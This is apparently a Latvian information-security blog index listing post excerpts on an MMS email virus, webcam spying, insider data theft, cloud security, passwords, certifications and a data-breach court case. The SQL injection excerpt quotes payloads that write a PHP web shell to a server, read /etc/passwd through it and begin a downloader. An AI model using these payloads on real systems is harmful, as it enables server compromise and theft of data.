MMS vīruss no LMT un Tele2

Saistībā ar iepriekšējo rakstu šodien saņēmu skaidrojumu no Cert par šī vīrusa darbību: Sveiki! Vīruss izveido failu “svchost.exe” zem “Documents and Settings\All Users” un atver Windows Firewall šīs programmas piekļuvi internetam. Fails tiek startēts no HKLM\Software\Microsoft\Windows\Run kurā izveidots ieraksts “SunJavaUpdateShed”. Papildus aktivitātes pagaidām nē esam fiksējuši, izskatās ka tas gaida citu moduļu ielādi no interneta. ...

Vīrusu izplatītāji nesnauž 5

Dažas nedēļas atpakaļ tika novērots pieplūdums ar “it kā” no LMT sūtītām vēstulēm, kuras saturēja “it kā” saņēmējam nosūtītu MMS ziņu, kaut gan faktiski tas bija diezgan vienkārši noslēpts vīruss. LMT uz to noreaģēja ierakstos savā facebook lapā: UZMANĪBU! Brīdinām par e-pasta vēstulēm ar kaitējumprogrammatūru, kas sūtītas kā MMS no LMT klientu numuriem XXXXXXXX@mms.lmt.lv ar ...

Webcam hacking 1

Webcam hacking neliels video, kas veltīts tēmai vai vienmēr zinām kas mūs vēro. Šai problēmai tika sāka pievērsties kad tika aizturēti un vēlāk notiesāti ar vien vairāk cilvēku, kuri iegūstot piekļuvi datoru webkamerām izspiegoja savus upurus. Soda mēri ir dažādi no 6 mēn, līdz 6 gadiem. http://nakedsecurity.sophos.com/2008/08/06/another-man-accused-of-peeping-tom-webcam-hack/ http://nakedsecurity.sophos.com/2011/09/02/peeping-tom-webcam-blackmail-jail/ Ar izdomu bija apveltīts kāds vīrietis, kurš ...

Aizejoša darbinieka risks

http://www.wired.com/threatlevel/2012/08/toyota-alleges-sabotage/ ir raksts par GlobalSource IT kompānijas Indiešu izcelsmes programmētāju, kurš sniedza ārpakalpojumus Toyota kompānijai un aizejot „aizņēmās” Toyota piederošu informāciju, kura, ja nonāktu konkurentu vai publiskā vidē pēc Toyota vārdiem radītu lielus zaudējumus. Pieminēšanas vērsts šis gadījums ir divu iemeslu dēļ: tāpēc, ka vadītāji bieži nenovērtē cilvēku atriebības spēju, kuriem tiek palūgts atrast ”citus ...

Cik drošs ir mākoņpakalpojums (cloud services)? 3

Šī jautājuma nozīme palielinās ar katru dienu, jo uzņēmumiem (tai skaitā privātpersonām) gribās samazināt savas izmaksas tai pašā laikā iegūstot papildu funkcionalitāti un viens no veidiem kā to izdarīt ir tieši mākoņi (e-pasti, projektu vadības rīki, datu glabāšanas, CRM, apstrādes jaudas, utml). No paša sākuma ir jāatzīmē, ka nav viennozīmīgas un universālas atbildes vai mākoņpakalpojumi ...

Katrai sistēmai savu paroli- tiešām? 2

Gribi justies droši? Tādā gadījumā katrai sistēmai ir jāizmanto sava parole. Diezgan tipiska atbilde ko var dzirdēt, bet vai tas vispār ir iespējams? Pēc LinkedIn gadījuma veicu savu lietotājvārdu/paroļu revīziju un saskaitīju aptuveni 25 sistēmas, kurās man datu drošība un identitāte vismaz maz drusku uztrauc. Atcerēties 25 paroles nav praktiski iespējams, kur nu vēl visas ...

CISM sertifikāts nav pielīdzinām CISSP, IUB noraida KPMG sūdzību 4

Interesantu rakstu pamanīju defense.lv, kur tika publicēts KPMG nelabvēlīgs IUB lēmums un atzīts, ka konkrētā gadījumā CISM nav ekvivalents CISSP. Sūdzības pamatā bija fakts, ka pasūtītājs (VID) iepirkumā prasīja speciālistu ar CISSP sertifikātu, bet KPMG piedāvāja speciālistu ar pieredzi un CISM sertifikātu uzskatot, ka tas ir alternatīvs CISSP. Kā rezultātā no turpmākas dalības konkursā KPMG tika izslēgts. Kam interesē motivējošā ...

Salted Password Hashing – Doing it Right vai kā pareizi veidot hešotas paroles ar salt

Viens labs resurs, kur apskatītas tipiskākās kļūdas un paskaidrots kā rīkoties pareizi: http://crackstation.net/hashing-security.htm Tweet

SQL injection Knowledge Base

Pilnīgākais resurss, kuru esmu redzējis saistība ar SQL injekcijām. http://websec.ca/kb/sql_injection Tiem, kam interesē cik vienkārši var izmantojot kļūdaini uzrakstītas komandas un sql augšpielādes shell skatās piemēru šeit: http://websec.ca/kb/sql_injection#MySQL_Writing_Files Examples: To write a PHP shell: SELECT ‘<? system($_GET[\’c\’]); ?>’ INTO OUTFILE ‘/var/www/shell.php’;   and then access it at: http://localhost/shell.php?c=cat%20/etc/passwd To write a downloader: SELECT ‘<? fwrite(fopen($_GET[f], \’w\’), file_get_contents($_GET[u])); ...

“BTA” cenšas izvairīties no soda par nolaidīgu personas datu glabāšanu

Defense blogā ieraudzīju rakstu par BTA (https://defense.lv/2012/07/04/bta-censas-izvairities-no-soda-par-nolaidigu-personas-datu-glabasanu/) un atmiņām pievienoju arī tiesas izrakstu. Šis gadījums šķiet interesants trīs iemeslu dēļ: ir reāls piemērs notiesājošam spriedumam un ir zināms arī soda summa ja paskaidrojumā ir minēta taisnība, tad kāpēc netika saglabāti pierādījumi par urķēsanu? jo vairāk parādīsies notiesājoši spriedumi un tie tiks darīti zināmi sabiedrībai, jo ...